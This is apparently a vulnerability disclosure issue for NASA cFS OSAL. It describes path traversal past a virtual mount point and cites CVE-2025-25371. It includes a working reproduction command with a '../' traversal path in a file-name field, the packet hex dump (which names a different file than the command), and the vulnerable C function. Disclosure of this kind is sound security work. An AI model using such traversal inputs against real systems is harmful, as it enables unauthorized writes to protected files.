Path traversal vulnerability due to unchecked virtual mount point path

[Levitiku5]

Describe the bug
OS_FileSys_FindVirtMountPoint() accepts any path whose prefix matches the virtual mount point string, without validating subsequent components. This might allow an attacker to append ../ or ./ after a legitimate virtual mount prefix, making unauthorized path traversal possible.

To Reproduce
Steps to reproduce the behavior:

1. Send a malicious command to write a file outside of the virtual mount point:

./cmdUtil --host=localhost --port=1234 --pktid=0x1888 --pktfc=6 --endian=LE --uint32=1 --uint32=20 --int64=0x40 --string="64:" --string="64:/cf/../../../data/new_file"
sending data to '192.168.1.31' (IP : 192.168.1.31); port 1234
Data to send:
0x18 0x88 0xC0 0x00 0x00 0x91 0x06 0x4B
0x01 0x00 0x00 0x00 0x14 0x00 0x00 0x00
0x40 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x2F 0x63 0x66 0x2F 0x2E 0x2E 0x2F 0x2E
0x2E 0x2F 0x2E 0x2E 0x2F 0x64 0x61 0x74
0x61 0x2F 0x6D 0x61 0x6C 0x69 0x63 0x69
0x6F 0x75 0x73 0x5F 0x66 0x69 0x6C 0x65
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

2. Observe the new file created outside of the virtual mount point:

ls
cf  core-cpu1  EEPROM.DAT  new_file

Expected behavior
Path traversal should not be possible in this manner for security reasons. The function exit before path traversal occurs.

Code snips
osal/src/os/shared/src/osapi-filesys.c:

/*----------------------------------------------------------------
 *
 *  Purpose: Local helper routine, not part of OSAL API.
 *           Checks if the filesys table index matches the "virtual_mountpt" field.
 *           Function is Compatible with the Search object lookup routine
 *
 *  Returns: true if the entry matches, false if it does not match
 *
 *-----------------------------------------------------------------*/
bool OS_FileSys_FindVirtMountPoint(void *ref, const OS_object_token_t *token, const OS_common_record_t *obj)
{
    OS_filesys_internal_record_t *filesys;
    const char *                  target = (const char *)ref;
    size_t                        mplen;

    filesys = OS_OBJECT_TABLE_GET(OS_filesys_table, *token);

    if ((filesys->flags & OS_FILESYS_FLAG_IS_MOUNTED_VIRTUAL) == 0)
    {
        return false;
    }

    mplen = OS_strnlen(filesys->virtual_mountpt, sizeof(filesys->virtual_mountpt));

    /*
     * The virtual_mountpt member should be a substring of the search target.
     * If this matches a basic substring check then it may be match
     */
    if (mplen == 0 || mplen >= sizeof(filesys->virtual_mountpt) ||
        strncmp(target, filesys->virtual_mountpt, mplen) != 0)
    {
        /* not a substring, so not a match */
        return false;
    }

    /*
     * Confirm that the substring ends at either a directory separator
     * or the end of string  (so exact mount points also match).
     *
     * For instance consider a virtual_mountpt of /mnt/abc and searching
     * for target=/mnt/abcd - this should return false in that case.
     */
    return (target[mplen] == '/' || target[mplen] == 0);
}

System observed on:

• Hardware: All write-enabled hardware is vulnerable
• OS: Possible on any write enabled OS
• Versions: cFS Aquila, OSAL main

Additional context
CVE-2025-25371
NASA cFS version Aquila Software Vulnerability Assessment

Reporter Info
Levi Shafter - 21Software

[dzbaker]

Documenting intent of OSAL virtual paths in forthcoming v7.0.0 VDD.